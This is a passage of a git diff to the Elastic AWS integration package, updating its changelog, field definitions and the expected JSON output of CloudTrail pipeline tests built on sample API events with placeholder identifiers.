diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index cd43c9264d0e..5b50f820007c 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,18 @@ # newer versions go on top +- version: "2.7.0" + changes: + - description: Add tags.yml file so that integration's dashboards and saved searches are tagged with "Security Solution" and displayed in the Security Solution UI. + type: enhancement + link: https://github.com/elastic/integrations/pull/7955 + - description: Upgrade package spec to 3.0.0. + type: enhancement + link: https://github.com/elastic/integrations/pull/7955 + - description: Fix duplicated and invalid field definitions. + type: bugfix + link: https://github.com/elastic/integrations/pull/7955 + - description: Add missing dashboard filters. + type: bugfix + link: https://github.com/elastic/integrations/pull/7955 - version: "2.6.1" changes: - description: Fix AWS API Gateway logs dashboard lens diff --git a/packages/aws/data_stream/apigateway_logs/fields/fields.yml b/packages/aws/data_stream/apigateway_logs/fields/fields.yml index 26557e301160..e846f38be587 100644 --- a/packages/aws/data_stream/apigateway_logs/fields/fields.yml +++ b/packages/aws/data_stream/apigateway_logs/fields/fields.yml @@ -82,5 +82,5 @@ The full domain name used to invoke the API. - name: stage type: keyword - description: | - The deployment stage of the API call (for example, beta or prod). \ No newline at end of file + description: |- + The deployment stage of the API call (for example, beta or prod). diff --git a/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml b/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml index 3f722e145db5..18a094804efc 100644 --- a/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml +++ b/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml 
@@ -17,4 +17,4 @@ - name: event.dataset type: constant_keyword description: Event dataset - value: aws.apigateway_metrics \ No newline at end of file + value: aws.apigateway_metrics diff --git a/packages/aws/data_stream/apigateway_metrics/fields/fields.yml b/packages/aws/data_stream/apigateway_metrics/fields/fields.yml index 225cd9522ab7..24429f9d4cec 100644 --- a/packages/aws/data_stream/apigateway_metrics/fields/fields.yml +++ b/packages/aws/data_stream/apigateway_metrics/fields/fields.yml @@ -23,10 +23,6 @@ type: long description: The number of server-side errors captured in a given period. metric_type: gauge - - name: Count.sum - type: long - description: The total number API requests in a given period. - metric_type: gauge - name: IntegrationLatency.avg type: long description: The time between when API Gateway relays a request to the backend and when it receives a response from the backend. @@ -106,4 +102,4 @@ fields: - name: namespace type: keyword - description: The namespace specified when query cloudwatch api. \ No newline at end of file + description: The namespace specified when query cloudwatch api. diff --git a/packages/aws/data_stream/billing/fields/package-fields.yml b/packages/aws/data_stream/billing/fields/package-fields.yml index c8cdddc0f459..79d345dc58a4 100644 --- a/packages/aws/data_stream/billing/fields/package-fields.yml +++ b/packages/aws/data_stream/billing/fields/package-fields.yml @@ -20,6 +20,7 @@ type: keyword description: > ID used to identify linked account. + - name: name type: keyword description: > diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json index 5de1a260a717..a1a070ba8c20 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json 
+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json 
@@ -129,7 +129,9 @@ "kind": "event", "original": "{\"awsAccountId\":\"123456789123\",\"digestStartTime\":\"2020-09-11T18:36:49Z\",\"digestEndTime\":\"2020-09-11T19:36:49Z\",\"digestS3Bucket\":\"alice-bucket\",\"digestS3Object\":\"AWSLogs/123456789123/CloudTrail-Digest/us-west-2/2020/09/11/123456789123_CloudTrail-Digest_us-west-2_leh-ct-test_us-west-2_20200911T193649Z.json.gz\",\"digestPublicKeyFingerprint\":\"47aaa19f7eec22e9bd0b5e58cfade8cb\",\"digestSignatureAlgorithm\":\"SHA256withRSA\",\"newestEventTime\":\"2020-09-11T19:26:24Z\",\"oldestEventTime\":\"2020-09-11T18:32:04Z\",\"previousDigestS3Bucket\":\"alice-bucket\",\"previousDigestS3Object\":\"AWSLogs/123456789123/CloudTrail-Digest/us-west-2/2020/09/11/123456789123_CloudTrail-Digest_us-west-2_leh-ct-test_us-west-2_20200911T183649Z.json.gz\",\"previousDigestHashValue\":\"531914fcfa0dbacf0c9dd1475a1fdcb5dea6e85921409f3c3ec0ba39063c860\",\"previousDigestHashAlgorithm\":\"SHA-256\",\"previousDigestSignature\":\"10e0872f32fa1d299d0cc98e94d4c88a6a2eada9d9fc3ae6d53dfe8d54c7caf807072f1e1eec47efdeecfcc22483887f8fddfc954ae587fba43e7676b5547f432fa8722ba1c5baa6b233bcb528ce7c01e3748aab8f28c16c024de79da820128b4c9e5ce65e98a9c4e631687ecc89c224a11bb3df06ce441ff740e4ac9fbd41159e77f5863550118284121f193e357866fbd0463faffb56e194af196e35a7675c3bbd0a398f43159343c3f59129d6339a281a8fdb3192f3fffea9bd21dbb0a705ebfae1921f2133aab0ad29522aea6df0828c1780d3f3ed6b8270ab3ba24459916b0fbbe82fba6ff9677bafe7306e0f5edcc0f1508cdb4e36f3e3b30e653e9987\",\"logFiles\":[{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1930Z_l2pGqVS53QcGdAkp.json.gz\",\"hashValue\":\"420784a5bbc12e9ac442451e8ec1356744fdeabf4fee0d2222508db6d448139c\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:26:24Z\",\"oldestEventTime\":\"2020-09-11T19:26:24Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_Cl
oudTrail_us-west-2_20200911T1915Z_TIKlbLnJ6IwUxqxw.json.gz\",\"hashValue\":\"4e1eb2a8b41d032cbb16e5449fc8f3eac304e7d43017a391b37c788c77336196\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:11:18Z\",\"oldestEventTime\":\"2020-09-11T19:11:18Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1835Z_OPJhVNodH1gY760s.json.gz\",\"hashValue\":\"2695aeb3b4c1f021fe76e0b36f5ac15e557c41c58af6eef282d77ef056210d70\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:32:04Z\",\"oldestEventTime\":\"2020-09-11T18:32:04Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1925Z_zJNGzQovyNAImZV9.json.gz\",\"hashValue\":\"45a2906f55cbfc912584e9425f8d3d8d6fabf571a45a5ecd7d2a0f4132b81689\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:21:28Z\",\"oldestEventTime\":\"2020-09-11T19:21:28Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1855Z_RqN9YzoKAJCKbejj.json.gz\",\"hashValue\":\"515cc8be750d815266b4fc799c7600765f22502d29f5bb9d5c8969ffc5ab7097\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:51:21Z\",\"oldestEventTime\":\"2020-09-11T18:51:21Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1850Z_jLldN7U8XrspES8p.json.gz\",\"hashValue\":\"18650414e79e084dff02da66253f071347f7bb5c4863279bafe7762a980f7c0b\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:46:45Z\",\"oldestEventTime\":\"2020-09-11T18:46:45Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1905Z_jBNdmg4bSGxZ3wC8.json.gz\",\"hashValue\":\"54050ec665636f1985f5b51ae43c
74a58282cb2e500492a45f20a4dc1bf8a6d5\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:01:06Z\",\"oldestEventTime\":\"2020-09-11T19:01:06Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1920Z_bj5DRrmILF6jK23a.json.gz\",\"hashValue\":\"6e0d8fcbd712d3f6d1caf4a872681f4290b05ed8a8f1c9450a0a6db92ccab4d7\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:16:12Z\",\"oldestEventTime\":\"2020-09-11T19:16:12Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1900Z_6LjrkrhsLQMzCiSN.json.gz\",\"hashValue\":\"b2b0e2804d1c6b92d76eee203d7eba32d3d003e6967f175723a83ecc2d7ad4ba\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:56:05Z\",\"oldestEventTime\":\"2020-09-11T18:56:05Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1910Z_DLyqye8LaeoD204N.json.gz\",\"hashValue\":\"4397a13565a67d9ed6e57737b98eb7e61ca52bb191c9b5da0423136dfc5581c7\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:06:31Z\",\"oldestEventTime\":\"2020-09-11T19:06:31Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1845Z_TSDKyASOn2ejOq5n.json.gz\",\"hashValue\":\"94f09d2398632c7b0c0066ed5d56768632dd2e06ed9c80af9d0c2c5f59bd60b6\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:41:58Z\",\"oldestEventTime\":\"2020-09-11T18:41:58Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1840Z_btJydJ2t7hCRnjsN.json.gz\",\"hashValue\":\"9044f9a05d70688bc6f6048d5f8d00764ab65e132b8ffefb193b22ca4394d771\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:
37:10Z\",\"oldestEventTime\":\"2020-09-11T18:37:10Z\"}]}", "outcome": "success", - "type": "info" + "type": [ + "info" + ] }, "file": { "hash": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json index f1d2c80dc7ea..644d7b6fc618 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json @@ -11,12 +11,12 @@ }, "response_elements": { "keyFingerprint": "30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21", - "keyMaterial": "\u003csensitiveDataRemoved\u003e", + "keyMaterial": "", "keyName": "mykeypair" } }, "request_parameters": "{keyName=mykeypair}", - "response_elements": "{keyMaterial=\u003csensitiveDataRemoved\u003e, keyFingerprint=30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21, keyName=mykeypair}", + "response_elements": "{keyMaterial=, keyFingerprint=30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21, keyName=mykeypair}", "user_identity": { "access_key_id": "EXAMPLE_KEY_ID", "arn": "arn:aws:iam::123456789012:user/Alice", 
@@ -44,7 +44,7 @@ ], "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", - "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", + "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\"}}", "outcome": "success", "provider": "ec2.amazonaws.com", "type": [ 
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json index 8df0efb84e46..556ebd112062 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json @@ -59,7 +59,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"CreateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"enableLogFileValidation\":true,\"kmsKeyId\":\"\",\"isOrganizationTrail\":false},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":true,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-5149-4cf2-be99-EXAMPLE\",\"eventID\":\"EXAMPLE-d04b-4eff-833a-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ 
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json index ad1b3cb61fee..be8ef8955d24 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json @@ -39,7 +39,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T20:09:51Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"DeleteTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/test-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-d44f-4a2a-966f-EXAMPLE\",\"eventID\":\"EXAMPLE-3f9d-4634-8ff1-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json index 3b40245982ba..234e6baf3a28 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json 
@@ -71,7 +71,9 @@ "kind": "event", "original": "{\"eventVersion\":\"1.07\",\"eventTime\":\"2020-09-09T23:00:00Z\",\"awsRegion\":\"us-east-1\",\"eventID\":\"41ed77ca-d659-b45a-8e9a-74e504300007\",\"eventType\":\"AwsCloudTrailInsight\",\"recipientAccountId\":\"123456789012\",\"sharedEventID\":\"e672c2b1-e71a-4779-f96c-02da7bb30d2e\",\"insightDetails\":{\"state\":\"End\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"AttachUserPolicy\",\"insightType\":\"ApiCallRateInsight\",\"insffightContext\":{\"statistics\":{\"baseline\":{\"average\":0.0},\"insight\":{\"average\":2.0},\"insightDuration\":1,\"baselineDuration\":11459},\"attributions\":[{\"attribute\":\"userIdentityArn\",\"insight\":[{\"value\":\"arn:aws:iam::123456789012:user/Alice\",\"average\":2.0}],\"baseline\":[]},{\"attribute\":\"userAgent\",\"insight\":[{\"value\":\"console.amazonaws.com\",\"average\":2.0}],\"baseline\":[]},{\"attribute\":\"errorCode\",\"insight\":[{\"value\":\"null\",\"average\":2.0}],\"baseline\":[]}]}},\"eventCategory\":\"Insight\"}", "outcome": "success", - "type": "info" + "type": [ + "info" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json index 22f94b3fe107..b14fc675bab2 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json 
@@ -44,7 +44,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StartLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-1c30-4f43-9763-EXAMPLE\",\"eventID\":\"EXAMPLE-aa78-4a84-a27f-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json index 848adf07a476..ca541c2cdb78 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json 
@@ -44,7 +44,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-09T16:46:16Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-869f-4fec-86f9-EXAMPLE\",\"eventID\":\"EXAMPLE-8cc3-42db-9a0d-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json index 3cb61cdf8b88..190fd43c8547 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json 
@@ -55,7 +55,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\",\"tlsDetails\":{\"tlsVersion\":\"TLSv1.2\",\"cipherSuite\":\"ECDHE-RSA-AES128-GCM-SHA256\",\"clientProvidedHostHeader\":\"ssm.us-west-2.amazonaws.com\"}}", "outcome": "success", "provider": "iam.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index b67a62b73485..8861e8376392 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json 
@@ -40,7 +40,9 @@ "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "outcome": "failure", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ 
@@ -145,7 +147,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:58:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"isMultiRegionTrail\":true,\"enableLogFileValidation\":false,\"kmsKeyId\":\"\"},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"snsTopicARN\":\"\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":false,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-f3da-42d1-84f5-EXAMPLE\",\"eventID\":\"EXAMPLE-b5e9-4846-8407-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json index d99051d759e6..ccaeacdd84e8 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json 
